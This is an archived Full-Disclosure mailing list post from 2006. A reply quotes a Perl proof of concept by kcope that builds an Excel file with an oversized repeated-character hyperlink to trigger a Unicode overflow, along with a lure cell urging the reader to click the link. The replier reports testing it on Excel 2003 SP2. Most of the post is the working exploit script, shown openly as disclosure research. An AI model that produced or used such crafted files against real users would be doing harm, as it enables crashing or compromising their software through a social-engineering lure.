lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon Jun 19 12:22:12 2006
From: soloaway at gmail.com (. Solo)
Subject: ***ULTRALAME*** Microsoft Excel Unicode
	Overflow ***ULTRALAME***

hello, kcope,

This is what I test in excel 2003 sp2, I haven't excel 2002 :>

regards


2005/6/19, kcope <kingcope@....net>:
>
> Microsoft Excel Unicode Overflow
>
> Hello this is kcope,
> I found a unicode overflow in excel.
> It works in my version of excel, perhaps it is patched or something, I
> have
> SP3. I know this is ultralame. Attached are some screenies.
> Here are the warezcodez:
>
> ###############################
> # excelsexywarez.pl
> # excel unicode overflow poc
> # by kcope in 2006
> # thanks to revoguard and alex
> ###############################
> use Spreadsheet::WriteExcel;
>
>     my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");
>
>     $worksheet = $workbook->add_worksheet();
>
>     $format = $workbook->add_format();
>     $format->set_bold();
>     $format->set_color('red');
>     $format->set_align('center');
>
>     $col = $row = 5;
>     $worksheet->write($row, $col, "kcope in da house! Click on the
> link!!!", $format);
>
>     $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
>     $worksheet->write_url(0, 0, "$a", "LINK");
>
>
> - - kcdarookie
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060619/94267f4f/attachment-0001.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 1.JPG
Type: image/jpeg
Size: 327287 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060619/94267f4f/1-0001.jpe

Powered by blists - more mailing lists